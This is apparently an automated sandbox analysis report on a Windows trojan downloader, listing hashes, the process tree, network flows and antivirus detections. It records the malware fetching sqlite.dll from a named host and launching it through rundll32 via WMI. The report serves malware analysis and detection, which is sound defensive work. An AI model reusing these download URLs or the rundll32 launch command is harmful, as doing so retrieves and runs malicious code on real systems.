Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 15, 2021, 9:21 a.m.	Sept. 15, 2021, 9:25 a.m.

Size	99.0KB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`dc0b13c9d739e5bd085ed2e8a8a263ab`
SHA256	`62e37fc3978558112a3b09722240c1dec37d08fa56a2b3bee251f91d24bf3b3f`
CRC32	`1BAAE89A`
ssdeep	`3072:eqSBzzamtOr4iXAtjosMGtAyzqRgZuSabhK/:eqgmmWiaRDdK/`
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

f13058cb1065b13600fcb4a4f48e8ef9.exe "C:\Users\test22\AppData\Local\Temp\f13058cb1065b13600fcb4a4f48e8ef9.exe"
2220
rundll32.exe rundll32.exe "C:\Users\test22\AppData\Local\Temp\sqlite.dll",global
2236
- rundll32.exe rundll32.exe "C:\Users\test22\AppData\Local\Temp\sqlite.dll",global
  596

Name	Response	Post-Analysis Lookup
a.goatgame.co	A 172.67.146.70 A 104.21.79.144	104.21.79.144

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.146.70	Active	Moloch

Flow	SID	Signature	Category
TCP 192.168.56.101:49197 -> 172.67.146.70:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49197 172.67.146.70:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	2f:1b:f4:da:ad:da:2a:22:ea:dc:26:f0:35:83:25:0d:5d:29:4d:fb

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 15, 2021, 9:21 a.m.	computer_name: TEST22-PC	1	1	0

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 15, 2021, 9:21 a.m.		1	1	0

section

.gfids

request	GET https://a.goatgame.co/userf/dat/2202/sqlite.dat
request	GET https://a.goatgame.co/userf/dat/sqlite.dll

file	C:\Users\test22\AppData\Local\Temp\sqlite.dll

file	C:\Users\test22\AppData\Local\Temp\sqlite.dll

buffer

Buffer with sha1: 7c44952baa2433c554228dbd50613d7bf347ada5

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod Sept. 15, 2021, 9:21 a.m.	inargs.CurrentDirectory: None inargs.CommandLine: rundll32.exe "C:\Users\test22\AppData\Local\Temp\sqlite.dll",global inargs.ProcessStartupInformation: None outargs.ProcessId: 2236 outargs.ReturnValue: 0 flags: 0 method: Create class: Win32_Process	1	0	0

Lionic	Trojan.Win32.Zenlod.trSL
MicroWorld-eScan	Gen:Variant.Midie.98177
FireEye	Gen:Variant.Midie.98177
ALYac	Gen:Variant.Midie.98177
Cylance	Unsafe
K7AntiVirus	Trojan-Downloader ( 005823071 )
Alibaba	TrojanDownloader:Win32/Zenlod.ffc81adc
K7GW	Trojan-Downloader ( 005823071 )
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/TrojanDownloader.Agent.FWK
APEX	Malicious
Kaspersky	Trojan-Downloader.Win32.Zenlod.lle
BitDefender	Gen:Variant.Midie.98177
Avast	Win32:PWSX-gen [Trj]
Tencent	Malware.Win32.Gencirc.11cd41c0
Ad-Aware	Gen:Variant.Midie.98177
Emsisoft	Gen:Variant.Midie.98177 (B)
DrWeb	Trojan.Inject4.16523
McAfee-GW-Edition	BehavesLike.Win32.Trojan.nh
Sophos	Mal/Generic-S
Webroot	W32.Trojan.Gen
Avira	TR/Dldr.Agent.jzjrk
Antiy-AVL	Trojan/Generic.ASMalwS.3499B3E
Kingsoft	Win32.TrojDownloader.Zenlod.l.(kcloud)
Gridinsoft	Trojan.Win32.Downloader.sa
Microsoft	Trojan:Win32/Sabsik.FL.A!ml
GData	Gen:Variant.Midie.98177
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C4629763
McAfee	GenericRXAA-AA!DC0B13C9D739
MAX	malware (ai score=85)
VBA32	BScope.Trojan.Injector
Malwarebytes	Trojan.Downloader
Yandex	Trojan.DL.Zenlod!mADlXNWinFs
Ikarus	Trojan-Downloader.Win32.Agent
eGambit	Unsafe.AI_Score_88%
Fortinet	W32/Zenlod.FWK!tr.dldr
AVG	Win32:PWSX-gen [Trj]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_100% (W)

f13058cb1065b13600fcb4a4f48e8ef9.exe